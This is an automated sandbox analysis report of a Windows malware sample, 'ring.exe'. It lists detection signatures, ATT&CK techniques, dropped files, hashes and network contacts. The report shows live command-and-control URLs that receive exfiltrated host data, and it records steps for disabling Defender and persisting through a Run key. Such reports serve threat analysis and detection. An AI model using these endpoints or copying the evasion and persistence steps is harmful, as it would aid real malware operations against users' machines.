Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\ring.exeFile opened: \\\VBoxMiniRdrDNJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Registry Run Keys / Startup Folder
12
Process Injection
1
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory111
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Process Injection
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558818 Sample: ring.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 84 32 adsklbb.org 2->32 34 api64.ipify.org 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Machine Learning detection for sample 2->46 48 AI detected suspicious sample 2->48 50 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->50 9 ring.exe 1 18 2->9         started        14 ring.exe 2->14         started        16 ring.exe 2->16         started        signatures3 process4 dnsIp5 36 adsklbb.org 24.152.39.13, 49705, 49707, 55417 MasterDaWebBR unknown 9->36 38 api64.ipify.org 104.237.62.213, 49701, 80 WEBNXUS United States 9->38 40 154.205.156.20, 49702, 80 IKGUL-26484US Seychelles 9->40 28 C:\Users\user\AppData\Roaming\...\ring.exe, PE32 9->28 dropped 30 C:\Users\user\...\ring.exe:Zone.Identifier, ASCII 9->30 dropped 54 Adds a directory exclusion to Windows Defender 9->54 56 Opens network shares 9->56 18 cmd.exe 1 9->18         started        58 Multi AV Scanner detection for dropped file 14->58 60 Machine Learning detection for dropped file 14->60 file6 signatures7 process8 signatures9 42 Adds a directory exclusion to Windows Defender 18->42 21 powershell.exe 23 18->21         started        24 conhost.exe 18->24         started        process10 signatures11 52 Loading BitLocker PowerShell Module 21->52 26 WmiPrvSE.exe 21->26         started        process12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ring.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Win_24230\ring.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Win_24230\ring.exe18%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://154.205.156.20/Painel/atualiza_update.php0%Avira URL Cloudsafe
http://154.205.156.20/Painel/atualizar_dados.php0%Avira URL Cloudsafe
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.750%Avira URL Cloudsafe
http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
adsklbb.org
24.152.39.13
truetrue
    unknown
    api64.ipify.org
    104.237.62.213
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75false
      • Avira URL Cloud: safe
      unknown
      http://api64.ipify.org/?format=textfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://154.205.156.20/Painel/atualizar_dados.phpring.exe, ring.exe.4.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.indyproject.org/ring.exe, ring.exe.4.drfalse
          high
          http://154.205.156.20/Painel/atualiza_update.phpring.exe, ring.exe.4.drfalse
          • Avira URL Cloud: safe
          unknown
          http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Bring.exe, 00000004.00000002.2527929541.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2529177771.000000000366D000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          154.205.156.20
          unknownSeychelles
          26484IKGUL-26484USfalse
          104.237.62.213
          api64.ipify.orgUnited States
          18450WEBNXUSfalse
          24.152.39.13
          adsklbb.orgunknown
          270564MasterDaWebBRtrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1558818
          Start date and time:2024-11-19 20:35:12 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 23s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:18
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:ring.exe
          Detection:MAL
          Classification:mal84.spyw.evad.winEXE@9/9@2/3
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target ring.exe, PID 6300 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: ring.exe
          TimeTypeDescription
          14:36:15API Interceptor17x Sleep call for process: powershell.exe modified
          14:36:16API Interceptor1x Sleep call for process: ring.exe modified
          20:36:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinSesp C:\Users\user\AppData\Roaming\Win_24230\ring.exe
          20:36:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinSesp C:\Users\user\AppData\Roaming\Win_24230\ring.exe
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          104.237.62.213http://ERICADLERCLOTHING.comGet hashmaliciousUnknownBrowse
            sqlite.dllGet hashmaliciousUnknownBrowse
              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                  SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                    9poHPPZxlB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                          PM7K6PbAf0.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, StealcBrowse
                            FileApp.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRATBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              api64.ipify.orghttp://ERICADLERCLOTHING.comGet hashmaliciousUnknownBrowse
                              • 104.237.62.213
                              d1bc91bd44a0.exeGet hashmaliciousPrivateLoader, Stealc, VidarBrowse
                              • 173.231.16.77
                              file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                              • 173.231.16.77
                              sqlite.dllGet hashmaliciousUnknownBrowse
                              • 104.237.62.213
                              66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                              • 173.231.16.77
                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                              • 173.231.16.77
                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                              • 104.237.62.213
                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                              • 173.231.16.77
                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                              • 173.231.16.77
                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                              • 104.237.62.213
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              MasterDaWebBRReservation Detail Booking.com ID4336.vbsGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                              • 24.152.39.120
                              image.ps1Get hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                              • 24.152.39.120
                              17305370450a724087c7f6981143cf069ec0c685c80f69cbd81880d785e4b0d131e53bb2a9297.dat-decoded.exeGet hashmaliciousNjratBrowse
                              • 24.152.38.77
                              17305370457af8060c5c3c6d7e83c17b8f6083a3c41c5dd21323a637c4bf05d8d8bd79484b331.dat-decoded.exeGet hashmaliciousNjratBrowse
                              • 24.152.38.77
                              2ktrFR0W3v.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                              • 24.152.39.227
                              DZNtmwlTFY.exeGet hashmaliciousNjratBrowse
                              • 24.152.39.227
                              j84mNh4z90.exeGet hashmaliciousNjratBrowse
                              • 24.152.39.227
                              xtuHcaTJtwiA.exeGet hashmaliciousRemcosBrowse
                              • 24.152.37.147
                              zfT2dBXgtH.elfGet hashmaliciousMirai, OkiruBrowse
                              • 24.152.39.205
                              SYYMW2Y7m2.elfGet hashmaliciousMirai, OkiruBrowse
                              • 24.152.39.205
                              IKGUL-26484USHZ1ZzlIpm7.vbeGet hashmaliciousFormBookBrowse
                              • 198.44.251.205
                              mpsl.elfGet hashmaliciousMiraiBrowse
                              • 156.238.135.134
                              dvwkja7.elfGet hashmaliciousMiraiBrowse
                              • 154.90.25.186
                              ppc.elfGet hashmaliciousMiraiBrowse
                              • 156.231.181.91
                              tarm7.elfGet hashmaliciousMiraiBrowse
                              • 156.231.181.98
                              tmips.elfGet hashmaliciousMiraiBrowse
                              • 156.231.181.43
                              PO_11000262.vbsGet hashmaliciousFormBookBrowse
                              • 198.44.251.51
                              sora.sh4.elfGet hashmaliciousMiraiBrowse
                              • 156.249.231.105
                              nullnet_load.spc.elfGet hashmaliciousMiraiBrowse
                              • 156.238.135.144
                              nullnet_load.x86.elfGet hashmaliciousMiraiBrowse
                              • 156.249.132.14
                              WEBNXUShttps://hacktools.sh/Get hashmaliciousUnknownBrowse
                              • 107.182.163.162
                              http://tvdseo.comGet hashmaliciousUnknownBrowse
                              • 107.182.163.162
                              xd.sh4.elfGet hashmaliciousMiraiBrowse
                              • 142.4.54.171
                              sora.mips.elfGet hashmaliciousMiraiBrowse
                              • 192.69.213.181
                              a.htaGet hashmaliciousDarkComet, DarkTortilla, NeshtaBrowse
                              • 216.158.90.138
                              http://ERICADLERCLOTHING.comGet hashmaliciousUnknownBrowse
                              • 104.237.62.213
                              https://attservicesinc.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                              • 67.220.226.233
                              https://www.mediafire.com/file/dl1ll51b96z8hcb/paginas_para_descargar_Vectores_gratis_2018.zip/fileGet hashmaliciousUnknownBrowse
                              • 67.220.228.201
                              gkjeNrdkot.elfGet hashmaliciousMiraiBrowse
                              • 64.185.231.196
                              d1bc91bd44a0.exeGet hashmaliciousPrivateLoader, Stealc, VidarBrowse
                              • 173.231.16.77
                              No context
                              No context
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:Unicode text, UTF-8 text, with no line terminators
                              Category:dropped
                              Size (bytes):200
                              Entropy (8bit):5.103507445471441
                              Encrypted:false
                              SSDEEP:3:ocsHUq8dUV2hcFfL8/jBK8hv1xu9wr0qpE11MGNstDUrZOFdNIAzXPCTK/1VWC:oHW9hcxLs9vHFrRqCwZOFPIAzXIel
                              MD5:22868ABF80E396FB8A7C5F27A82A2C4E
                              SHA1:398C626F408A701A3B83A97C6555E7F26ECBA1DD
                              SHA-256:FDCC20DF3C1D998528B44D2FE027B492BA0206CAAD704E719946F9DF44E86499
                              SHA-512:866347B8E2C7B04D8FE27433D4389B780591F65102F4E30A1DDFE545BE17E7B976907C9C8496D8CA2EE5A056711C6734FBB1E2E3A8761285E1B9E6D607DA18D8
                              Malicious:false
                              Reputation:low
                              Preview:Dados Recebidos:<br>Nome do PC: 960781<br>Vers.o do Windows: Windows 10.0 (Build 19045) <br>.ltima Atualiza..o: 2024-11-19<br>Status: Instalada<br>Dados salvos com sucesso no arquivo desktops.txt!
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.380747059108785
                              Encrypted:false
                              SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:lGLHxvIIwLgZ2KRHWLOugEs
                              MD5:98BD0A3DBC29BD9486474C3069740CE0
                              SHA1:D2D2389EC77D5C090CB7A232747C1E74CD2F3346
                              SHA-256:0BDF783C058C98376CF0951AEB1A960CD03118E836EAFE4977BB5B616AB368E9
                              SHA-512:17B166F024D169FDF4F7F5AC95A53A1380E625B496A0CA04392A7E2538D73F3F8FB70585C6CFC0DA05CD50B45EDDC7B04321B3816D39FE4261F547D6FA900CDC
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):17488384
                              Entropy (8bit):4.786504001985185
                              Encrypted:false
                              SSDEEP:49152:3h+ZMbgw1VoIj5CSYS9o9IpHiYXcaXoMx+q2zAkcq085zXnCC7CWRUFGwhnb1b:3h+ZYD5DXc6oMx7CAkL0iz3T8T1b
                              MD5:DEC85DE31C5A9E3754AB0FCFED8A3E79
                              SHA1:B47C8F4918518F1538842B5B12BC5DCBEA5C3D59
                              SHA-256:FA4F6DA9EA8ACA025D129328CE57B36343A1BC8796D1846D02157D2242F904A8
                              SHA-512:34831FF6C2571F0354BD5958A036A0030C85CAB0C6DCB47C881CB366A47ADF20741D6A473BE369C20A1535FDE380F0BE6BC53C5EDB96D4729A92D4BBF47BF0AA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 18%
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....<g.................XJ..~......TrJ.......J...@.......................................@......@....................L.m....0L..;...@S..v....................L.$.............................L.....................x:L.8....pL......................text....#J......$J................. ..`.itext...2...@J..4...(J............. ..`.data....*....J..,...\J.............@....bss.....{....K..........................idata...;...0L..<....K.............@....didata......pL.......K.............@....edata..m.....L.......K.............@..@.tls....X.....L..........................rdata..].....L.......K.............@..@.reloc..$.....L.......K.............@..B.rsrc....v...@S..v...dR.............@..@....................................@..@................
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Users\user\Desktop\ring.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):12
                              Entropy (8bit):2.8553885422075336
                              Encrypted:false
                              SSDEEP:3:tR6r:k
                              MD5:2859916D3768B8859995F1AB7D03A74C
                              SHA1:0531F9B1D851BBA2E56C3DDC8B2B173C30E5117F
                              SHA-256:AC19D06F24FE1D63584CA24CF2F30F99A45AE7AFC9AFC9A2F58754B19AC175CD
                              SHA-512:F26287C42157ED198417540B90685C008B15E127BF48117922BDFA8DD42A4A0489D72F11DAC89F22685021C625BF257D430A3901AFB72DF78381E3FEEB1C12AE
                              Malicious:false
                              Preview:2024-11-19..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):4.786504001985185
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.45%
                              • Inno Setup installer (109748/4) 1.08%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              File name:ring.exe
                              File size:17'488'384 bytes
                              MD5:dec85de31c5a9e3754ab0fcfed8a3e79
                              SHA1:b47c8f4918518f1538842b5b12bc5dcbea5c3d59
                              SHA256:fa4f6da9ea8aca025d129328ce57b36343a1bc8796d1846d02157d2242f904a8
                              SHA512:34831ff6c2571f0354bd5958a036a0030c85cab0c6dcb47c881cb366a47adf20741d6a473be369c20a1535fde380f0be6bc53c5edb96d4729a92d4bbf47bf0aa
                              SSDEEP:49152:3h+ZMbgw1VoIj5CSYS9o9IpHiYXcaXoMx+q2zAkcq085zXnCC7CWRUFGwhnb1b:3h+ZYD5DXc6oMx7CAkL0iz3T8T1b
                              TLSH:2907B20A594AD025D6E10FF6E835F29CD826FF381B94842D45523ABA49F34E12D2EF37
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:1c0d51316e630605
                              Entrypoint:0x8a7254
                              Entrypoint Section:.itext
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x673CD9EA [Tue Nov 19 18:33:14 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:5d836336e2a3e8a72b29dc47ad486ef9
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFF0h
                              push ebx
                              mov eax, 00896CA8h
                              call 00007FB1D43B9E58h
                              mov ebx, dword ptr [008BA2B8h]
                              mov eax, dword ptr [ebx]
                              call 00007FB1D45C856Bh
                              mov eax, dword ptr [ebx]
                              xor edx, edx
                              call 00007FB1D45CA54Eh
                              mov eax, dword ptr [ebx]
                              mov byte ptr [eax+6Fh], 00000000h
                              mov ecx, dword ptr [008BA7D0h]
                              mov eax, dword ptr [ebx]
                              mov edx, dword ptr [008903C8h]
                              call 00007FB1D45C8561h
                              mov ecx, dword ptr [008BA154h]
                              mov eax, dword ptr [ebx]
                              mov edx, dword ptr [0088F6A4h]
                              call 00007FB1D45C854Eh
                              mov eax, dword ptr [ebx]
                              call 00007FB1D45C86A7h
                              pop ebx
                              call 00007FB1D43B1F8Dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
